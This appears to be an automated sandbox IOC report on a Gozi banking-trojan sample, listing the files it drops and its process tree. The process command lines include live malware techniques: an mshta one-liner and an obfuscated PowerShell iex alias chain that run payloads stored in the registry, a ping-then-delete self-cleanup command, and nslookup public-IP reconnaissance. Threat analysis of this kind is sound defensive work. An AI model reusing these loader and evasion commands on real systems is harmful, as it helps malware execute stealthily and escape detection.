IOC Report

loading gif

Files

File Path
Type
Category
Malicious
gozi.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
clean
C:\Users\user\AppData\Local\Temp\3B0F.bi1
ASCII text, with CRLF line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\5n300s0s.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\5n300s0s.out
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
modified
clean
C:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP
MSVC .res
dropped
clean
C:\Users\user\AppData\Local\Temp\RES73F8.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
dropped
clean
C:\Users\user\AppData\Local\Temp\RES8712.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epyy1szg.01u.psm1
very short file (no magic)
dropped
clean
C:\Users\user\AppData\Local\Temp\hscan34n.0.cs
UTF-8 Unicode (with BOM) text
dropped
clean
C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
dropped
clean
C:\Users\user\AppData\Local\Temp\hscan34n.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
clean
C:\Users\user\AppData\Local\Temp\hscan34n.out
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
modified
clean
C:\Users\user\DeviceFile.ps1
ASCII text, with no line terminators
dropped
clean
C:\Users\user\Documents\20220112\PowerShell_transcript.768287.AFX4atZf.20220112130217.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
clean
C:\Users\user\SettingsDocument.lnk
MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
dropped
clean
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
clean
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\gozi.exe
"C:\Users\user\Desktop\gozi.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
malicious
C:\Windows\System32\control.exe
C:\Windows\system32\control.exe -h
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\System32\PING.EXE
ping localhost -n 5
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
malicious
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
malicious
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
malicious
C:\Windows\System32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
malicious
C:\Windows\System32\cmd.exe
cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
malicious
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
clean